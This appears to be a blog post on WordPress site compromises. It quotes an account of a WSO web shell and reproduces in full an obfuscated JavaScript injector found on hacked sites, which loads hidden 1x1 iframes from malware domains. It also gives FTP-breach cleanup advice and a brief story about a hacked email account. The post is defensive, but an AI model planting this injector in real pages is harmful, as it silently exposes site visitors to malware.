WordPress is great, but the more people that use it, the more “criminals” out there that will target it’s vulnerabilities.
Alex has a detailed write up covering his site being hacked, in My website was hacked – yours could be too! You won’t know until it’s too late.
From the article (read the whole thing):
Yesterday I found out that my website had been hacked. Not only that, but it had been hacked months ago, and I hadn’t even noticed. How did this happen?
I only found out about it because somebody was kind enough to email me to let me know that they saw this on Google
Even the best of us get hacked when we use any “standardized” platform (Windows, OS X, WordPress, Drupal, etc.).
What is WSO? It’s an environment hackers can upload to your server when they find a vulnerability, and use it to access everything on your site. When you’ve been hacked, this is the payload that a hacker wants delivered. It could site dormant for months before being activated. Ever hear about those “Zombie Computers”? WSO is like a bite from a zombie, it can transform your website into anything they want at any time, all they have to do is wake it up.
Did Alex make any mistakes? Maybe … he should have been aware of the TimThumb vulnerability, as most WordPress developers were. Is it his fault? Not really.
If you found your server hacked in the past few days (maybe through a browser alert in Chrome) with the following code:
<script>ti=’.c’;ai=’af’;qo=’p’;jn=’htm’;rf=’n’;tf=’doz’;yn=’ifr’;xm=’s’;cl=’o’;jd=’k9′; nn=’tv.’;rl=’85y’;r=’umu’;eh=’m/’;ec=’htt’;sb=’rc’;f=’ame’;l=’://’;b=yn.concat(f); gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute(‘width’,’1′);xp.setAttribute(‘height’,’1′); xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script><script>wa=’t’;p=’ht’;f=’k98′;tb=’ame’;bg=’.’;v=’sr’;g=’tp:’;vf=’/z’;bs=’t’;px=’v.h’; br=’yt’;k=’c’;yr=’m’;ds=’m’;ej=’/’;au=’/’;t=’com’;sp=’ifr’;r=’ca’;cp=’y’;wz=’ir’; wf=’u’;b=’5′;se=sp.concat(tb);oz=v.concat(k); db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute(‘width’,’1′);ip.setAttribute(‘height’,’1′); ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>
Then you should know it is likely a breach of your FTP password.
You will find that code inserts iframes that spread the malware, linking to the following sites (do not go there):
- http:|| numudozaf . com
- http:|| zirycatum . com
First, you need to figure out which machine caused the breach. Some computer(s) with FTP information stored was breached. If you give that computer a new FTP account, it will just get hacked again.
Based on some reports online, it is likely that every FTP site you have access to was compromised (if you were the source of the compromise). You should request logs from your web host, to identify which user caused the problem.
I’m not always the biggest fan of Microsoft, but I have to admit they have a large reach and significant resources.
Recently a friend of mine mentioned his MSN account got hacked, and that it was a vulnerability in “some Microsoft software”.
It’s scary just how much your email account controls nowadays. In my friend’s example, his credit cards were manipulated, his facebook account stolen, his email was hijacked (duh), and many of his other accounts linked to that email were stolen. Our email account is used to validate bank accounts (occasionally, although many other means of security are used), many of our “social” accounts, medical records, credit cards, and almost everything we do.
Microsoft recently suggested that he install their recent piece of security software to prevent this …